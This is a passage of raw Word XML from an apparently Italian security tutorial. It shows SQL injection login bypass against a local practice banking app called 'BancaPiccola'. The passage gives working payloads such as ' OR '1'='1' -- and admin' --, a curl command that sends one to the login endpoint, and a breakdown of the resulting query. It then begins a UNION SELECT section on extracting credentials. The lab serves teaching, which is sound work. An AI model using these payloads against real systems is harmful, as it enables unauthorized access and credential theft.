        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">(parentesi escluse: solo i caratteri fra le parentesi). Nel campo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Password</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">scrivi:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">qualsiasi-cosa</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Clicca</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Accedi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Risultato:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sei autenticato. Probabilmente come</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">admin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, l’amministratore. Vai su</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/dashboard</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">per verificare.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">📷</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Screenshot:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dashboard di BancaPiccola con la dicitura</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Sei autenticato come: admin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, dopo aver inserito un username sintatticamente fasullo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5669280" cy="3307080"/>
            <wp:docPr id="13" name="Picture 13"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="screenshot_13_dashboard_di_BancaPiccola_con_la_dicitura_Sei_autenticato_co.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5669280" cy="3307080"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="212"/>
    <w:bookmarkStart w:id="213" w:name="cosa-è-successo-riga-per-riga"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cosa è successo, riga per riga</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Guarda il terminale dove gira Flask. Vedrai stampato:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">[DEBUG] Query eseguita: SELECT id, username, ruolo FROM utenti WHERE username='' OR '1'='1' AND password='qualsiasi-cosa'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Decostruiamo. La query che il programmatore voleva costruire era:</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username, ruolo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> utenti</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'_INPUT_USER_'</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'_INPUT_PWD_'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sostituendo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">_INPUT_USER_</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">' OR '1'='1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">_INPUT_PWD_</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">qualsiasi-cosa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, otteniamo:</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username, ruolo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> utenti</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OR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'1'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'1'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">AND</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'qualsiasi-cosa'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ora colora i pezzi mentalmente:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1092"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">username = ''</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— confronto fra username e stringa vuota: falso</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1092"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">'1'='1'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— confronto fra</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">'1'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">'1'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">sempre vero</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1092"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">password = 'qualsiasi-cosa'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— confronto con una password che non esiste: falso</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L’espressione completa diventa:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">falso OR vero AND falso</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Per le regole di precedenza degli operatori SQL,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">AND</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ha priorità su</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">OR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, quindi l’espressione è valutata come</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">falso OR (vero AND falso)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">falso OR falso</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">falso</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Aspetta — se è falso, perché funziona? Perché alcune varianti dell’attacco usano:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">admin' --</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">(letteralmente: la parola</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">admin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">seguita da apice, spazio, due trattini). La query diventa:</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username, ruolo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> utenti</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NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--' AND password = 'qualsiasi'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In SQL,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">--</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">è il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">simbolo di inizio commento</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: tutto quello che segue sulla stessa riga viene ignorato. Quindi la query effettivamente eseguita è:</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username, ruolo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> utenti</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> username </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'admin'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">E il database restituisce la riga di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">admin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Il codice prende</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">riga[0]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(id) e fa il login.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Sei admin senza conoscere la password.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="213"/>
    <w:bookmarkStart w:id="214" w:name="prova-entrambe-le-varianti"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Prova entrambe le varianti</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Esci dalla sessione (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/logout</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) e ritenta queste tre stringhe come username (password = qualsiasi):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Stringa nel campo username</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Risultato</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">' OR '1'='1' --</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Login come primo utente (di solito admin)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">admin' --</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Login esattamente come admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">mario' --</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Login esattamente come mario, senza conoscere la sua password</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Tre stringhe. Tre login non autorizzati.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Senza forza bruta, senza phishing, senza accesso fisico al server.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="214"/>
    <w:bookmarkStart w:id="215" w:name="test-con-curl"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Test con curl</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Prova lo stesso attacco con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">curl</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Apri un secondo terminale e digita (su una riga sola):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -X POST -d "username=admin' --&amp;password=x" -c /tmp/cookie.txt </w:t>
      </w:r>
      <w:hyperlink r:id="rId44">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">http://127.0.0.1:5000/login</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> -L</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">(lo switch</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">salva i cookie ricevuti,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-L</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">segue i redirect). Vedrai stampata la pagina della dashboard: hai fatto login da terminale, sfruttando SQLi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="215"/>
    <w:bookmarkEnd w:id="216"/>
    <w:bookmarkStart w:id="223" w:name="X7ce7c6a545a21736aa403c8e93fd92afc697958"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="501" w:name="sec_5_6"/>
      <w:r>
        <w:t xml:space="preserve">5.6 Secondo attacco: estrarre dati con UNION SELECT</w:t>
      </w:r>
      <w:bookmarkEnd w:id="501"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Adesso un attacco più sofisticato. Useremo la barra di ricerca (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/cerca</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) per</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">estrarre dati che non dovremmo poter vedere</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: nello specifico, le credenziali di tutti gli utenti del database.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="217" w:name="preparazione-una-ricerca-normale"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Preparazione: una ricerca normale</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vai su</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId45">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">http://127.0.0.1:5000/cerca?q=conto</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(o usa la casella di ricerca dalla home cercando</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">conto</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Vedi due risultati:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Conto Base</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Conto Premium</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Tutto normale.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Guarda il terminale Flask:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
